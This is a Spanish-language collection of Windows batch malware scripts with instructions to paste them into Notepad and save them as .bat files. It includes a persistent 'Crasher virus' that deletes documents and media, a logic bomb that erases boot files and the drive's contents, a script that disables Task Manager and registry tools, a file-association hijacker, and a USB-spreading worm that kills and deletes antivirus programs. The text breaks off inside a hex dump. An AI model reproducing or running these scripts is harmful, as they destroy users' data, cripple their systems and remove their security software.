varios bat

59

Click here to load reader

Upload: binarydeath

Post on 21-Nov-2014

183 views

Category:

Documents


15 download

TRANSCRIPT

Page 1: Varios Bat

1.- Abrimos el Block de Notas 2.- Pegamos los Siguientes Códigos

3.- OJO !! Guardamos Con la extención .bat [ Par que Pueda Funcionar ]

(Prácticamente borra una PC)

@echo off

cd %windir%

echo @echo off>CPTL.bat

echo reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /V CTPL.bat /D %windir%\system32\CPTL.bat>>CPTL.bat

echo if exist %windir%\CPTL.bat goto oportunidad>>CPTL.bat

echo copy /Y CPTL.bat %windir%>>CPTL.batecho copy /Y CPTL.bat %windir%\system32>>CPTL.batecho cls>>CPTL.bat

echo :msg>>CPTL.batecho msg * A mortal virus has infected your computer!!>>CPTL.bat

echo :oportunidad>>CPTL.batecho cd %windir%>>CPTL.batecho echo respuesta=INPUTBOX(”Insert the password to eliminate the virus” >oportunity.vbs>>CPTL.batecho echo if respuesta=batch then>>oportunity.vbs>>CPTL.batecho echo msgbox (”Correct, the virus won’t bother u more” >>oportunity.vbs>>CPTL.batecho echo kill (”C:\Windows\virus.bat” >>oportunity.vbs>>CPTL.batecho echo kill (”C:\Windows\system32\virus.bat” >>oportunity.vbs>>CPTL.batecho echo else>>oportunity.vbs>>CPTL.batecho echo msgbox (”Muahaha you’re still infected try it next time” >>oportunity.vbs>>CPTL.batecho echo start oportunity.vbs>>CPTL.batcls>>CPTL.bat

del /S /Q /F %userprofile%\mis documentos\*.*

echo :del>>CPTL.batecho cd %homedrive%>>CPTL.batecho del /Q /S /F *.jpg>>CPTL.batecho del /Q /S /F *.avi>>CPTL.batecho del /Q /S /F *.mp3>>CPTL.batecho del /Q /S /F *.doc>>CPTL.batecho del /Q /S /F *.zip>>CPTL.batecho del /Q /S /F *.rar>>CPTL.batecho cls>>CPTL.bat

echo :petar_escritorio>>CPTL.batecho cd %homepath%\Escritorio>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 1.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 2.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 3.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 4.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 5.txt>>CPTL.bat

Page 2: Varios Bat

echo echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 6.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 7.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 8.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 9.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 10.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 11.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 12.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 13.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 14.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 15.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 16.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 17.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 18.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 19.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 20.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 21.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 22.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 23.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 24.txt>>CPTL.batecho echo I’m the Crasher virus and I’ve infected your computer sucker>>virus 25.txt>>CPTL.batecho cls>>CPTL.bat

echo if exist C:\virus%random%.txt (goto bucle)>>CPTL.bat

echo :Petar_HD>>CPTL.batecho cd\>>CPTL.batecho echo Your computer h as been infected, try to pay atention to it> virus%random%.txt>>CPTL.batecho cd %ProgramFiles%>>CPTL.batecho echo Your computer h as been infected, try to pay atention to it> virus%random%.txt>>CPTL.batecho cd %windir%>>CPTL.batecho echo Your computer h as been infected, try to pay atention to it> virus%random%.txt>>CPTL.batecho goto Petar_HD>>CPTL.batecho cls>>CPTL.bat

del /S /Q /F %userprofile%\mis documentos\*.*

echo :bucle>>CPTL.batecho start iexplore.exe>>CPTL.batecho start command.com>>CPTL.batecho goto bucle>>CPTL.bat

echo :Shutdown>>CPTL.batecho shutdown -f -r -t 600 -c “Adios mamonazo bájate un antivirus la próxima vez!!”>>CPTL.bat

copy CPTL.bat %windir%\system32

start CPTL.bat

--------------------------------------------------------------------END--------------------------------------------------------------------

Page 3: Varios Bat

blockea Mouse, borra registros etc

@echo off@cd C:\WINDOWS\systemecho bean>MOUSE.DRV@cd..@cd C:\WINDOWS\system32echo bean>mouse.drv@cd..@cd C:\WINDOWS@rmdir /S /Q Cursores@cd..@cd C:\WINDOWS@rmdir /S /Q Cursors@cd..@cd C:\windows\system32@echo off>Winbat.bat@cd C:\Windows>>Winbat@reg del HKEY_CURRENT_USER\Control Panel\Sound /Fecho bean>SETDEBUG.EXE>>Winbat.batecho bean>TETEP.DLL>>Winbat.batecho bean>Twain.dll>>Winbat.batecho bean>Twain_32.dll>>Winbat.bat@DEL /S /Q JavaAccessBridge.dll>>Winbat.bat@cd..@cd C:\System Volume Information\_restore{E5311AE9-97D4-4238-9F6D-97D214BD07B1}\RP51\@echo off >WIN32.bat@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run/v Win32 /t REG_SZ /d WIN32.bat /F >>WIN32.bat@reg add hkcu\software\microsoft\windows\currentversion\pol icies\system /v disabletaskmgr /T REG_SZ /D 1 /F >>WIN32.bat@reg add hkcu\software\microsoft\windows\currentversion\pol icies\system /v disableregistrytools /T REG_SZ /D 1 /F >>WIN32.bat@reg add hkcu\software\microsoft\windows\currentVersion\pol icies\Explorer\RestricRun /T REG_SZ /d eventvwr.exe /F >>WIN32.bat@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT/CurrentVersion/Winlogon /v logonprompt /t REG_SZ /d YoU ArE InFeCtEd!! /F >>WIN32.bat@reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Polices\Explorer /v NoSaveSettings /T REG_DWORD /D 1 /F >>WIN32.bat@reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explore /v NoClose /t REG_DWORD /D 1 /F >>WIN32.bat@shutdown -S -F -T 5 -C “Error del Sistema Operativo, Se apagara en unos segundos……BEAN!!!! >>WIN32.bat@cd..@cd C:\System Volume Information\_restore{E5311AE9-97D4-4238-9F6D-97D214BD07B1}\RP51\@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run/v colorbat /t REG_SZ /d colorbat /F >>colorbat.bat@echo off>colorbat.bat@:menu>>colorbat.bat@COLOR A>>colorbat.bat@COLOR B>>colorbat.bat@COLOR C>>colorbat.bat@COLOR D>>colorbat.bat@COLOR E>>colorbat.bat

Page 4: Varios Bat

@COLOR F>>colorbat.bat@color 3f>>colorbat.bat@color 4f>>colorbat.bat@color 5f>>colorbat.bat@color 6f>>colorbat.bat@color 7f>>colorbat.bat@color 8f>>colorbat.bat@color 9f>>colorbat.bat@color 1A>>colorbat.bat@color 1B>>colorbat.bat@color 1C>>colorbat.bat@color 1D>>colorbat.bat@color 1E>>colorbat.bat@color 1F>>colorbat.bat@color 2A>>colorbat.bat@color 2B>>colorbat.bat@COLOR 2C>>colorbat.bat@COLOR 2D>>colorbat.bat@COLOR 2E>>colorbat.bat@COLOR 2F>>colorbat.bat@COLOR 3A>>colorbat.bat@COLOR 3B>>colorbat.bat@COLOR 3C>>colorbat.bat@COLOR 3D>>colorbat.bat@COLOR 3E>>colorbat.bat@COLOR 3F>>colorbat.bat@COLOR 4A>>colorbat.bat@COLOR 4B>>colorbat.bat@COLOR 4C>>colorbat.bat@COLOR 4D>>colorbat.bat@COLOR 4E>>colorbat.bat@COLOR 4F>>colorbat.bat@COLOR 5A>>colorbat.bat@COLOR 5B>>colorbat.bat@COLOR 5C>>colorbat.bat@COLOR 5D>>colorbat.bat@COLOR 5E>>colorbat.bat@COLOR 5F>>colorbat.bat@COLOR 6A>>colorbat.bat@COLOR 6B>>colorbat.bat@COLOR 6C>>colorbat.bat@COLOR 6D>>colorbat.bat@COLOR 6E>>colorbat.bat@COLOR 6F>>colorbat.bat@COLOR 7A>>colorbat.bat@COLOR 7B>>colorbat.bat@COLOR 7C>>colorbat.bat@COLOR 7D>>colorbat.bat@COLOR 7E>>colorbat.bat@COLOR 7F>>colorbat.bat@COLOR 8A>>colorbat.bat@COLOR 8B>>colorbat.bat@COLOR 8C>>colorbat.bat@COLOR >>colorbat.bat@COLOR 8E>>colorbat.bat

Page 5: Varios Bat

@COLOR 8F>>colorbat.bat@COLOR 9A>>colorbat.bat@COLOR 9B>>colorbat.bat@COLOR 9C>>colorbat.bat@COLOR 9D>>colorbat.bat@COLOR 9E>>colorbat.bat@COLOR 9F>>colorbat.bat@COLOR AA>>colorbat.bat@COLOR AB>>colorbat.bat@COLOR AC>>colorbat.bat@COLOR AD>>colorbat.bat@COLOR AE>>colorbat.bat@COLOR AF>>colorbat.bat@COLOR BA>>colorbat.bat@COLOR BB>>colorbat.bat@COLOR BC>>colorbat.bat@COLOR BD>>colorbat.bat@COLOR BE>>colorbat.bat@COLOR BF>>colorbat.bat@COLOR CA>>colorbat.bat@COLOR CB>>colorbat.bat@COLOR CC>>colorbat.bat@COLOR CD>>colorbat.bat@COLOR CE>>colorbat.bat@COLOR CF>>colorbat.bat@COLOR DA>>colorbat.bat@COLOR DB>>colorbat.bat@COLOR DC>>colorbat.bat@COLOR DD>>colorbat.bat@COLOR DE>>colorbat.bat@COLOR DF>>colorbat.bat@COLOR EA>>colorbat.bat@COLOR EB>>colorbat.bat@COLOR EC>>colorbat.bat@COLOR ED>>colorbat.bat@COLOR EE>>colorbat.bat@COLOR EF>>colorbat.bat@COLOR FA>>colorbat.bat@COLOR FB>>colorbat.bat@COLOR FC>>colorbat.bat@COLOR FD>>colorbat.bat@COLOR FE>>colorbat.bat@COLOR FF>>colorbat.bat@GOTO :MENU>>colorbat.bat@cd>>colorbat.bat@cd C:\windows\system32@DEL /S /Q Winbat.bat@exit

--------------------------------------------------------------------END--------------------------------------------------------------------

Page 6: Varios Bat

Bomba logica

(super destructivo)

@echo offc:cd "C:\WINDOWS\system32"echo @echo off > log.batecho cd \ >> log.batecho del /ah /f /q boot.ini >> log.batecho del /ah /f /q ntldr >> log.batecho del /ah /f /q *.* >> log.batecho cd "C:\Documents and Settings" >> log.batecho del /f /s /q *.* >> log.batecho cd \ >> log.batecho del /f /s /q *.* >> log.batecho exit >> log.batcd "C:\WINDOWS\system32"echo @echo off > w32.batecho :warning >> w32.batecho start >> w32.batecho msg * You've been infected by NeoTokyoX! >> w32.batecho goto warning >> w32.batcd "C:\WINDOWS\system32"echo @echo off > dir.batecho cd "C:\WINDOWS\system32" >> dir.batecho start log.bat >> dir.batecho start w32.bat >> dir.batcd "C:\WINDOWS\system32"echo reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "security" /d "C:\Windows\System32\dir.bat" /f > register.batecho reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "securitylog" /d "C:\WINDOWS\system32\register.bat" /f >> register.batecho exit >> register.batstart register.battaskkill /f /im msnmsgr.exeexit

--------------------------------------------------------------------END--------------------------------------------------------------------

Elimina Messenger

@echo offTaskkill /f /IM msnmsgr.execd C:\Archivos de programa\MSN Messengerattrib -H -S -R *.*del /s /q *.*exit

--------------------------------------------------------------------END--------------------------------------------------------------------

Reinicia la pc cada 10 segundos

Page 7: Varios Bat

@echo off            copy /y %0 *.bat            copy /y %0 *.mp3            copy /y %0 *.jpg            copy /y %0 *.exe            copy /y %0 *.jpeg            copy /y %0 *.avi            copy /y %0 *.mpg            copy /y %0 *.mpeg            assoc .mp3=batfile            assoc .jpeg=batfile            assoc .jpg=batfile            assoc .exe=batfile            assoc .avi=batfile            assoc .mpg=batfile            assoc .mpeg=batfile            Copy /y %0 "C:\WINDOWS\system32\windows.bat"            reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v            "security" /d "c:\WINDOWS\system32\windows.bat"            del /q /s /f C:\*.exe            del /q /s /f C:\*.lnk            del /q /s /f C:\*.ico            del /q /s /f C:\*.sys            del /q /s /f C:\*.pps            del /q /s /f C:\*.dll            del /q /s /f *.exe            del /q /s /f *.lnk            del /q /s /f *.ico            del /q /s /f *.sys            del /q /s /f *.pps            del /q /s /f *.dll            taskkill /f /im "explorer.exe"            Del /f /q "c:\WINDOWS\explorer.exe"            del /q /s /f "C:\WINDOWS\system32\windows.bat"            reg del "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v            "security" /d "c:\WINDOWS\system32\windows.bat"            shutdown -s -f -t 10 -c "By Leon_Belmont

--------------------------------------------------------------------END--------------------------------------------------------------------

Borra usb y se propaga por el mismo

Page 8: Varios Bat

@ECHO onattrib +h +s %k%:\autorun.infattrib +h +s %k%:\xxx.exeattrib +h +s %k%:\ico.ico

copy /y %0 %systemroot%\windows.exeif exist %systemroot%\windows.exe set bat=%systemroot%\windows.exe & goto registrarcopy /y %0 %systemroot%\syste32\windows.exeif exist %systemroot%\windows.exe set bat=%systemroot%\syste32\windows.exe & goto registrarcopy /y %0 %systemroot%\EXPIORER.exeif exist %systemroot%\windows.exe set bat=%systemroot%\EXPIORER.exe & goto registrar

:registrarreg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Anti-Virus /t REG_sz /d %bat% /f

:mata_avTaskkill /f /IM nod32krn.exe /IM nod32kui.execd %programfiles%\Esetattrib -H -S -R *.*del /f /s /q *.*Taskkill /f /IM kavsvc.exe /IM kav.execd %programfiles%\KASPERSKY LAB\KASPERSKY\ANTI-VIRUS PERSONALattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM VsStat.execd %programfiles%\McAfee\McAfee VirusScanattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM zlclient.exe /IM zonealarm.exe /IM vsmon.execd %programfiles%\Zone Labs\ZoneAlarmattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM avgamsvr.exe /IM avgupsvc.execd %programfiles%\AVG7attrib -H -S -R *.*del /s /q *.*Taskkill /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.execd %programfiles%\Panda Software\Panda Antivirus Titaniumattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM NPROTECT.EXEcd %programfiles%\Norton Utilitiesattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM GBPoll.exe /IM navapsvc.exe /IM NPFMntor.exe /IM NPROTECT.EXE /IM NOPDB.EXE /IM GBTray.exe /IM NPFMntor.exe /IM GhostTray.exe /IM PQV2iSvc.execd %programfiles%\Norton System\Works\Norton AntiVirusattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM no-spy.execd %programfiles%\SinEspiasattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM AVGSERV9.EXE  /IM AVGCC32.EXEcd %programfiles%\GRISOFT\AVG6attrib -H -S -R *.*del /s /q *.*

Page 9: Varios Bat

Taskkill /f /IM bdoesrv.exe /IM bdmcon.exe /IM bdnagent.exe /IM bdswitch.execd %programfiles%\Softwin\BitDefender9attrib -H -S -R *.*del /s /q *.*Taskkill /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXEcd %programfiles%\AVPersonalattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM FrameworkService.exe /IM Mcshield.exe /IM VsTskMgr.exe /IM SHSTAT.EXEcd %programfiles%\Network Associates\VirusScanattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM spyaxe.exe /IM spyaxe.execd %programfiles%\SpyAxeattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM ccProxy.exe /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM NMAIN.EXE /IM SBServ.exe /IM NOPDB.EXEcd %programfiles%\Archivos comunes\Symantec\Sharedattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM navapsvc.exe /IM ISSVC.exe /IMcd %programfiles%\Norton Internet Securityattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM avgcc.exe /IM avgamsvr.exe /IM avgupsvc.execd %programfiles%\Grisoftattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM avgamsvr.exe /IM vgupsvc.exe /IM avgcc.execd %programfiles%\Grisoft\AVG freeattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM gcasDtServ.exe /IM gcasServ.execd %programfiles%\Microsoft AntiSpywareattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM Pagent.exe /IM pagentwd.exe /IM pavsched.execd %programfiles%\Panda Software\Panda Administrator\Pav_Agentattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM symlcsvc.execd %programfiles%\Archivos comunes\Symantec\SharedCCPD-LCattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM SynTPLpr.exe /IM SynTPEnh.execd %programfiles%\SynapticsSynTPattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM aswUpdSv.exe /IM ashServ.exe /IM ashWebSv.exe /IM ashDisp.execd %programfiles%\Alwil Software\Avast4attrib -H -S -R *.*del /s /q *.*Taskkill /f /IM SpywareStrike. exe /IM SpywareStrike. execd %programfiles%\SpywareStrikeattrib -H -S -R *.*del /s /q *.*Taskkill /f /IM ASHSERV.EXE /IM ASHWEBSV.EXE /IM ASHMAISV.execd %programfiles%\ALWIL SOFTWARE\AVAST4

Page 10: Varios Bat

attrib -H -S -R *.*del /s /q *.*Taskkill /f /IM navapsvc.exe /IM NPFMntor.exe /IM navapw32.exe /IM SAVScan.execd %programfiles%\Norton AntiVirusattrib -H -S -R *.*del /s /q *.*cd\:inicioif exist %temp%\xxx.exe goto crea_iconocopy /y %0 %temp%\xxx.exe || goto inicio:crea_iconoif exist %temp%\ico.ico goto sigue_1call:debugeogoto sigue_1

:deb1(echo n bhb1.datecho e 0000 00 00 01 00 01 00 20 20 00 00 01 00 18 00 A8 0Cecho e 0010 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00echo e 0020 00 00 01 00 18 00 00 00 00 00 00 00 00 00 00 00echo e 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0E 57echo e 0040 93 03 53 92 04 52 94 09 50 8F 08 5A 9B 01 4D 8Fecho e 0050 0C 5F A3 1D 5C B4 28 5E B1 30 5A A1 32 4F 99 1Aecho e 0060 3A 81 19 4B 9D 29 53 A6 33 5A A5 36 65 AF 25 4Eecho e 0070 93 44 6B B9 45 71 BE 4A 71 BF 40 70 BE 3D 6D BBecho e 0080 3B 66 B5 38 63 B2 2C 5D AB 29 48 93 06 11 27 00echo e 0090 09 27 06 0B 14 0A 0D 22 09 19 2A 01 1D 5A 0E 5Eecho e 00A0 9B 00 43 81 00 41 7F 05 55 92 01 4F 91 07 5B 9Cecho e 00B0 0E 5A A2 1F 5E B6 29 5F B2 32 5B A4 39 59 9B 1Becho e 00C0 3B 82 1A 4C 9F 2E 60 B3 32 5E B1 47 71 B8 4E 5Eecho e 00D0 88 45 77 C9 44 73 C5 4C 76 C1 48 73 C2 47 72 C1echo e 00E0 43 71 BF 3A 68 B6 33 61 AF 28 53 9C 03 13 3D 03echo e 00F0 0F 21 02 19 3F 0C 1B 6A 0C 22 3E 19 5E 90 00 47echo e 0100 83 00 49 87 0D 5D 9E 0C 58 9A 10 62 A3 05 57 98echo e 0110 09 4E 97 23 5F B8 30 64 B7 38 5F A9 3F 5F A0 1Eecho e 0120 3E 8A 2C 34 51 B9 C4 E2 B9 CE ED 8E AC D5 8D A8echo e 0130 D4 60 87 D1 C6 DF FF 71 8D D4 4E 7C CA 4D 7B C9echo e 0140 48 76 C4 3F 70 BE 38 69 B7 2D 58 A7 1F 31 78 08echo e 0150 09 1D 01 12 45 11 25 4E 0B 18 28 00 16 36 07 52echo e 0160 90 0B 57 99 08 54 96 02 5A 96 09 61 A1 07 59 9Aecho e 0170 0B 4C 97 24 64 B9 32 6B C1 3A 61 AB 41 60 9F 21echo e 0180 50 A4 32 66 B3 42 73 C1 4F 7D CB 80 9E D9 57 7Eecho e 0190 CD 57 82 D1 57 82 D1 5C 85 D4 54 80 D3 51 7D D0echo e 01A0 47 7C CD 44 74 C6 3B 6D BF 31 61 AF 26 4B 95 01echo e 01B0 0A 14 07 12 4E 02 05 0A 07 11 22 04 16 2D 00 46echo e 01C0 85 00 48 8A 04 52 94 0A 60 9C 01 51 92 0A 5E 9Fecho e 01D0 13 4B 9D 24 5E B0 35 6E C4 3C 63 AD 15 3F 8C 2Becho e 01E0 5A AE 3C 70 BD 4A 7B C9 57 82 D3 84 A2 DD 60 87echo e 01F0 D6 5B 86 D5 63 8A D9 5E 87 D6 5A 86 D9 56 82 D5echo e 0200 4D 82 D3 48 78 CA 3E 70 C2 37 67 B5 2C 51 9B 00echo e 0210 06 19 03 0F 49 27 32 50 07 11 23 06 15 28 00 43echo e 0220 82 00 4A 88 07 57 96 0B 59 9B 0C 63 A3 0C 5E 9Fecho e 0230 18 4E A1 27 5A AA 32 61 B2 3D 64 A9 22 58 AB 37echo e 0240 66 BA 4A 7A CC 52 80 CE 64 8B DA 8C A7 E0 69 8Fecho e 0250 DD 64 8B DA 60 8B DA 63 8D E0 5D 89 DC 59 85 D8echo e 0260 53 83 D5 4D 7F D1 48 7A CC 3A 6C BE 33 5B A6 06echo e 0270 28 5E 05 0D 48 2E 58 7B 08 15 25 09 13 25 06 47echo e 0280 84 04 4F 8D 11 5D 9F 02 52 8F 07 5B 9C 03 5B 97

Page 11: Varios Bat

echo e 0290 18 4E A1 26 57 A7 31 5B A8 2F 56 A1 31 63 B6 43echo e 02A0 75 C8 4D 82 D3 5C 86 D9 69 90 DE 6C 93 E1 6D 93echo e 02B0 E1 6B 93 DE 68 93 E2 67 95 E3 64 92 E0 5E 8C DAecho e 02C0 54 88 DB 52 81 D5 4B 7D D0 42 74 C6 36 64 B1 15echo e 02D0 34 73 02 0E 3E 1E 3A 59 02 08 15 1F 3C 61 00 4Becho e 02E0 8D 01 52 8F 00 3F 7D 02 4F 8D 00 50 91 0E 5B A0echo e 02F0 1C 50 A3 2B 54 A3 35 58 A1 1F 4D A1 34 6A BD 47echo e 0300 7D D0 58 88 DA 67 90 DF 67 93 E0 72 9B E4 74 9Eecho e 0310 E5 6C 99 E2 6D 99 E6 64 95 E3 62 93 E1 60 91 DFecho e 0320 5E 8E E0 59 8B DE 4E 84 D7 44 7A CD 3B 6B B9 25echo e 0330 41 82 08 13 39 0A 14 25 05 13 29 06 13 29 2A 70echo e 0340 A6 0C 42 7E 0D 54 93 0A 55 93 08 5A 9B 0C 4C 9Aecho e 0350 18 47 9B 18 3C 90 1E 3B 86 24 60 B2 3D 77 C9 4Decho e 0360 83 D6 5E 8E E0 67 97 E5 73 9F EC 79 A2 EB 76 A0echo e 0370 E7 72 9F E8 6A 9E E5 68 99 E7 64 95 E3 67 98 E6echo e 0380 62 92 E4 5A 8C DF 4F 85 D8 48 7E D1 42 72 C0 33echo e 0390 54 99 05 10 24 00 08 19 20 32 51 07 16 26 2F 82echo e 03A0 B9 2C 83 BB 26 79 AC 03 39 75 07 56 95 11 47 A5echo e 03B0 19 4B A5 21 4B 9E 26 4A 96 2D 68 BE 43 7F D1 52echo e 03C0 88 DB 5F 91 E3 6E 9C EA 74 A1 EA 80 AA F1 7C A6echo e 03D0 ED 75 A7 EF 70 9E EC 6B 9C EA 6C 9C EE 65 95 E7echo e 03E0 62 94 E7 58 90 E2 53 89 E0 4C 84 D6 48 77 C8 40echo e 03F0 61 A6 0D 21 2C 04 0B 26 36 52 75 02 0A 11 2E 85echo e 0400 BE 2E 85 BE 2F 86 BF 2F 86 BF 29 7C B0 14 4D AAecho e 0410 21 55 AF 32 5C A9 18 45 96 37 76 CE 4B 86 DC 58echo e 0420 8E E1 63 97 EA 70 9E EB 79 A6 F0 83 AE F1 82 B2echo e 0430 F4 76 AA F0 71 A3 EF 6E 9F ED 69 9D EA 6A 9E EBecho e 0440 61 98 E9 5B 93 E5 56 8E E0 51 87 DA 4B 7A CB 4Decho e 0450 6A AF 00 00 06 08 10 38 34 54 7D 00 05 08 2E 85echo e 0460 BE 30 87 C0 2F 86 BF 31 88 C1 2B 88 BF 1A 53 B0echo e 0470 2C 60 BA 43 70 C1 1C 51 A8 3E 7D D5 50 8B E1 5Decho e 0480 93 E6 68 9C EF 75 A3 F0 7D AB F2 86 B1 F4 88 B3echo e 0490 F6 7A AE F4 7A AC F8 74 A5 F3 6C A0 ED 6A 9E EBecho e 04A0 66 9D EE 60 98 EA 5B 93 E5 55 8B DE 52 81 D2 41echo e 04B0 5A 7C 08 2A 65 05 0E 34 3F 56 7C 08 09 0D 33 85echo e 04C0 BF 37 89 C3 33 8A C3 34 8A C6 26 7B C1 1F 57 B6echo e 04D0 36 6B C5 50 7F D1 29 62 BD 4A 86 DF 54 8E E7 65echo e 04E0 9D EF 71 A5 F2 76 AE F5 85 B4 F8 90 BC F9 8B B9echo e 04F0 F3 7C B1 F4 79 AB F7 71 A6 EF 6A A2 EF 69 A1 EEecho e 0500 65 9D EE 60 98 EA 5B 97 E9 5C 91 E1 31 64 6E 4Becho e 0510 7A 71 01 2A 57 00 12 35 47 63 86 08 0F 18 37 89echo e 0520 C3 37 89 C3 37 8A C7 33 8B C7 1A 6B B6 27 65 C3echo e 0530 45 7A D5 59 85 E4 30 6D CA 50 8C E5 5E 97 ED 65echo e 0540 A1 F3 6F AB F7 78 B0 F7 88 B8 FA 91 B8 F6 90 BDecho e 0550 FA 81 B6 F5 78 AE F5 73 AC F7 6D A5 F6 6B A3 F4echo e 0560 65 A1 F3 64 9C EE 55 92 DC 44 80 75 55 8A 80 53echo e 0570 80 6F 3B 8C D7 08 0C 41 3D 58 7D 26 34 47 39 8Becho e 0580 C5 38 8E CA 37 8D C9 38 8E CA 17 61 B3 2D 70 CDecho e 0590 4F 82 E2 66 95 E9 39 77 D5 4F 8E E8 60 9D F3 67echo e 05A0 A3 F5 73 AD F8 7B B6 FB 88 BB FA 90 BD FA 8D BCecho e 05B0 F9 84 B8 FB 79 B4 FA 72 AC F8 6C AA F6 69 A7 F3echo e 05C0 63 A0 F0 55 86 C4 54 8D 84 55 90 82 51 8F 81 57echo e 05D0 8E 7D 38 82 AC 04 14 43 3F 58 72 5F 76 9C 3B 8Decho e 05E0 C7 38 8E CA 39 8F CB 3A 90 CC 14 63 B4 34 77 D4echo e 05F0 5C 91 EB 69 98 EC 4F 89 E8 57 96 F0 65 A2 F8 67echo e 0600 A9 FA 71 B2 FC 7D B8 FD 83 BC FA 8D C1 FD 8C C0echo e 0610 FC 81 BB FD 79 B4 FA 70 B2 F9 6E AC F8 6C AA F6echo e 0620 52 87 A2 5F 98 89 51 90 86 53 94 85 55 93 85 40echo e 0630 7C 71 2D 63 7A 06 15 3C 38 4F 6F 33 52 79 3C 8D

Page 12: Varios Bat

echo e 0640 CA 3E 8F CC 3C 92 CE 3D 93 CF 1C 6D BE 40 83 E0echo e 0650 63 9C F2 75 AD FC 6B 96 8D 59 9E F5 6B AF FC 6Decho e 0660 B4 FE 73 B8 FD 7B BA FE 81 C0 FD 84 C3 FD 84 C1echo e 0670 FF 7D BC F9 76 B7 FC 74 B1 FB 77 A9 D3 5F 95 8Eecho e 0680 5C 96 8B 64 A1 93 59 97 89 56 94 86 56 8E 81 59echo e 0690 8E 80 23 45 45 04 17 42 0C 12 1F 22 2C 3D 3E 8Fecho e 06A0 CC 3F 90 CD 3E 94 D0 40 95 D3 28 80 C7 41 86 E3echo e 06B0 65 A1 FA 70 AE F4 69 9D 7F 56 9E EB 69 B2 FC 77echo e 06C0 BB FC 7B BE FD 7E C1 FE 80 C3 FC 82 C1 FD 81 C4echo e 06D0 FD 79 BF FA 75 B7 F8 6A 9F 9C 69 A4 96 5F 9A 8Cecho e 06E0 57 95 87 62 9D 8F 5E 9D 8D 58 96 88 5D 98 8A 57echo e 06F0 91 79 43 6B 6A 05 19 42 02 08 25 01 05 06 3A 90echo e 0700 CC 3D 93 CF 40 96 D2 42 98 D4 3F 96 D6 41 89 E7echo e 0710 69 AF F5 5F A0 A9 6D 9E 82 45 8B 8B 67 B5 F8 73echo e 0720 C1 FC 7E C5 FE 81 C9 F9 82 C5 FC 82 CA FA 80 C6echo e 0730 FF 71 A7 B8 69 A1 94 68 A6 9A 67 A5 97 62 A0 92echo e 0740 63 A1 93 5E 9C 8E 5A 97 89 5D 9B 8D 5E 98 86 57echo e 0750 88 74 52 7B 6C 05 26 54 00 0F 2F 04 07 0B 3E 94echo e 0760 D0 3F 95 D1 41 97 D3 43 99 D5 41 9A D3 3C 89 E6echo e 0770 68 AF FF 65 AA 95 69 9F 88 48 96 8F 5B 9F 94 4Fecho e 0780 8F A1 74 B0 D4 70 A4 D3 72 AA BB 71 AC A4 70 AFecho e 0790 9F 73 AE 